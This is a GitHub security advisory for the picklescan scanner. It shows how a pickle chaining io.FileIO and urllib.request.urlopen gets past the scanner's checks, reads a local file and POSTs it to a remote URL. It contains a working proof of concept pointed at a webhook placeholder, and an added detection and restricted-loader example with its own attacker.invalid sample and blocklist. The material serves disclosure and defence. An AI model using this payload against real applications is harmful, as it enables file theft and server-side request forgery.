
CVE

GHSA-9726-w42j-3qjr

picklescan has Arbitrary file read using `io.FileIO`

Summary

picklescan does not flag a pickle that chains io.FileIO and urllib.request.urlopen. When such a pickle is loaded by an application that deserializes untrusted data, an unauthenticated attacker can read arbitrary files from the server and make it issue outbound requests (SSRF): the file contents (for example /etc/passwd) are sent as the body of a POST to an attacker-controlled URL. Neither callable is a code-execution primitive, so a blocklist tuned for RCE imports (os, exec) lets the chain through.

Details

The target application deserializes untrusted pickle data after checking it with picklescan. Although the usual RCE indicators (os, exec) are blocked, the exploit needs only two standard-library callables that a blocklist built around code execution does not cover:

  1. io.FileIO: opens a local file for reading without ever referencing builtins.open.
  2. urllib.request.urlopen: passing anything other than None as the data argument turns the request into a POST, and urllib accepts a file-like object as that body.
  3. Data exfiltration: during unpickling the file contents are streamed to the attacker-controlled URL; no code is executed, so none of the RCE-focused rules fire.

PoC

import pickle, io, urllib.request

class GetFile:
    # Reduces to io.FileIO('/etc/hosts', 'r'): the file is opened for reading
    # during unpickling without any reference to builtins.open.
    def __reduce__(self):
        return (io.FileIO, ('/etc/hosts', 'r'))

class Exfiltrate:
    # Reduces to urllib.request.urlopen(url, data): a non-None data argument
    # makes the request a POST whose body is read from the FileIO object.
    def __reduce__(self):
        return (urllib.request.urlopen, ('https://webhook.site/YOUR_UUID_HERE', GetFile()))

# Writing the pickle only records the call chain; it executes when the file is loaded.
with open("bypass_http.pkl", "wb") as f:
    pickle.dump(Exfiltrate(), f)

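What a scanner actually has to see, as an added example that is neither picklescan's code nor part of the advisory: the globals a pickle imports can be enumerated from its opcodes with pickletools without running it, so the io.FileIO plus urllib.request.urlopen chain above is visible statically, and an allowlisting Unpickler refuses it before any file is opened or any request is sent. Everything named here is assumed for the demonstration: the sample pickle is constructed in memory with a placeholder URL under the reserved .invalid domain, and BLOCKED and ALLOWED are illustrative sets, not picklescan's rule set. One caveat for blocklist authors: CPython records FileIO under its implementation module `_io`, and that is the module name written into the pickle, so a rule keyed on `io` alone misses it.

```python
"""Added example (not picklescan's code nor the advisory's PoC): enumerate the
globals a pickle imports with pickletools, without executing it, flag the
FileIO/urlopen chain, and load with an allowlisting Unpickler that refuses it.
BLOCKED and ALLOWED are hypothetical sets chosen for this demonstration."""
import io
import pickle
import pickletools
import urllib.request

_STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE",
               "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}

# Hypothetical blocklist. CPython records FileIO under its implementation
# module `_io`, so a list keyed on `io` alone would miss the advisory's chain.
BLOCKED = {("io", "FileIO"), ("_io", "FileIO"), ("urllib.request", "urlopen")}


def build_exfil_pickle(path="/etc/hosts", url="http://attacker.invalid/collect",
                       protocol=pickle.DEFAULT_PROTOCOL):
    """Constructed sample: the advisory's io.FileIO -> urlopen chain, in memory.
    Only the call chain is recorded; nothing is opened or fetched here. The URL
    is a placeholder under the reserved .invalid TLD."""
    class GetFile:
        def __reduce__(self):
            return (io.FileIO, (path, "r"))

    class Exfiltrate:
        def __reduce__(self):
            return (urllib.request.urlopen, (url, GetFile()))

    return pickle.dumps(Exfiltrate(), protocol=protocol, fix_imports=False)


def build_benign_pickle():
    """Constructed sample with no global imports at all."""
    return pickle.dumps({"a": [1, 2]})


def imported_globals(data):
    """Return (module, name) pairs the pickle would import, without loading it.
    Handles GLOBAL (protocol <= 3) and STACK_GLOBAL (protocol >= 4), including
    module/name strings fetched back from the memo instead of pushed anew."""
    found, memo, recent = [], {}, []
    n_memo, pushed = 0, False   # MEMOIZE indexes sequentially; pushed = top of stack is a known string
    for op, arg, _pos in pickletools.genops(data):
        name = op.name
        if name in _STRING_OPS:
            recent.append(arg)
            pushed = True
            continue
        if name in ("GET", "BINGET", "LONG_BINGET"):
            recent.append(memo.get(arg))
            pushed = True
            continue
        if name == "MEMOIZE":
            if pushed:
                memo[n_memo] = recent[-1]
            n_memo += 1
            continue                      # MEMOIZE leaves the stack untouched
        if name in ("PUT", "BINPUT", "LONG_BINPUT"):
            if pushed:
                memo[arg] = recent[-1]
            continue
        if name == "GLOBAL":              # pickletools reports arg as "module name"
            module, attr = arg.split(" ", 1)
            found.append((module, attr))
        elif name == "STACK_GLOBAL":      # module and name are the two strings beneath it
            found.append((recent[-2], recent[-1]))
        pushed = False
    return found


def scan(data):
    """Static check: the imported globals that appear on the blocklist."""
    return [g for g in imported_globals(data) if g in BLOCKED]


class RestrictedUnpickler(pickle.Unpickler):
    """The safer direction: permit only known-good globals and refuse the rest.
    find_class runs when the GLOBAL/STACK_GLOBAL opcode is reached, so the
    refusal happens before any file is opened or any request is sent."""
    ALLOWED = {("builtins", "set"), ("collections", "OrderedDict")}   # hypothetical allowlist

    def find_class(self, module, name):
        if (module, name) not in self.ALLOWED:
            raise pickle.UnpicklingError(f"refusing to import {module}.{name}")
        return super().find_class(module, name)


def safe_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def load_is_refused(data):
    """True when the restricted loader rejects the pickle."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    sample = build_exfil_pickle()
    print("imports:", imported_globals(sample))
    print("flagged:", scan(sample))
    print("refused by restricted loader:", load_is_refused(sample))
```

The static walk is the check a scanner can apply to an untrusted file; the restricted loader is what the consuming application should use regardless of scan results, because an allowlist does not depend on anticipating the next standard-library callable an attacker finds.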

Impact

  • Arbitrary file read
  • Server-side request forgery: the outbound POST originates from the deserializing host

Thanks for this library and your time. If you think picklescan is focused on detecting only RCE-kind vulnerabilities, rather than adding file I/O, HTTP, or any protocol-based ones that may cause a lot of noise, feel free to close this issue.

Package Versions Affected

Package / Version / Patch Availability: no items found.


CVSS

Severity: Critical
Base Score: 9.1
CVSS Version: 3.1
Score Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N


References

https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9726-w42j-3qjr
https://github.com/mmaitre314/picklescan/pull/55
https://github.com/mmaitre314/picklescan/commit/a01c58d5dd7960db557b849817c0ab83ab111ef1
https://github.com/mmaitre314/picklescan
https://github.com/mmaitre314/picklescan/releases/tag/v0.0.35


Basic Information

Ecosystem: PyPI (Python)
Base CVSS: 9.1
EPSS Probability: 0%
EPSS Percentile: 0%
Introduced Versions: 0, 0.0.1, 0.0.3, 0.0.5, 0.0.7, 0.0.15
Fix Available: 0.0.35
